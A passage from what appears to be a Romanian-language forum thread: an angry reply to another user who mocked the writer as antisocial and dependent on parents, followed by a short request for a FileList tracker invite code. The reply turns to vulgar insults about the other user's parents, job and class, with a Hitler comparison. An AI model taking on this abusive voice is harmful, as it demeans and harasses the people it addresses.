    E usor sa injuri pe internet, ha? ce faci tu? Te tin plamani sa-mi spui acelasi lucru in viata reala? Ce vreau eu, am spus host free sau ceva, de genu'? La munca, daca tu dai cu sapa pe camp sau stai pe la cablaje, nu inseamna ca toti ne dorim sa facem fix pix cu viata (dar stai chill cine-va trebuie sa faca si treaba de jos, oricum eu prefer sa-mi folosesc si creierul. Tu ramai la sapa sau ce drq faci tu). Anti social? Ba "socialule", frustatule freci menta si injuri oameni pe internet inca din 2013. Sa mor eu ce "interesant" esti. A.. da' si pe ce stau e pe banii parintilor? De-aia eu in vara lucram ajutor de bucatar? "Ca stau pe banii parintilor". A da.. si un mic Edit: Inainte sa-mi spui tu (fara nici o dovada desigur) ca lucrezi pe la mama drq nu stiu unde si faci enspe mii de euro. Vreau sa stii ca nu-mi pasa, du-te si descarcate pe ma-ta si pe tac-to nu pe forum daca esti frustat din cauza jobului tau unde faci nu stiu cate pule de aur dar seful tau tot nu-i multumit asa ca urla la tine mai ceva ca hitler.
  47. -2 points
  48. -2 points
    Daca poate sa imi dea si mie cnv un cod de FileList va rog
  • Create New...